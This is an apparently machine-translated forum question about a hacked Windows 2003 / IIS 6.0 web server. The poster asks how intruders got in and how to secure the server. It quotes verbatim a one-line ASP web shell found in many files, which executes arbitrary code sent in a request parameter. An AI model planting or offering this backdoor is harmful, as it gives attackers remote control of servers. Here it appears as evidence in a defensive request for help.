我的一位客户在谷歌搜索结果中注意到一条消息,称他们的网站可能已被黑客入侵。经过一番挖掘,我发现服务器上包含seo垃圾和JavaScript引用的html文件。我删除这些文件,更改密码CMS,更新一样CKFinder等一些部件...我认为我被黑客入侵并寻求建议
然后我就开始寻找到服务器上的其他网站,发现吨的.asp文件与该行
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
我已经删除了那些,但不知道他们是如何到达那里的。我已经浏览了各种日志(事件查看器,网站,ftp),但大多数文件创建后的时间不够长。
我已经更新了操作系统,这只有一两个过时的时间,并且改变了ftp访问。
我还能做些什么来找到入口点或确保我的服务器和网站安全吗?
BTW:这是运行IIS 6.0的Windows 2003服务器。
Windows 2003中是“只有一两个月过时”? – geoffspear
参考Windows更新... – SirM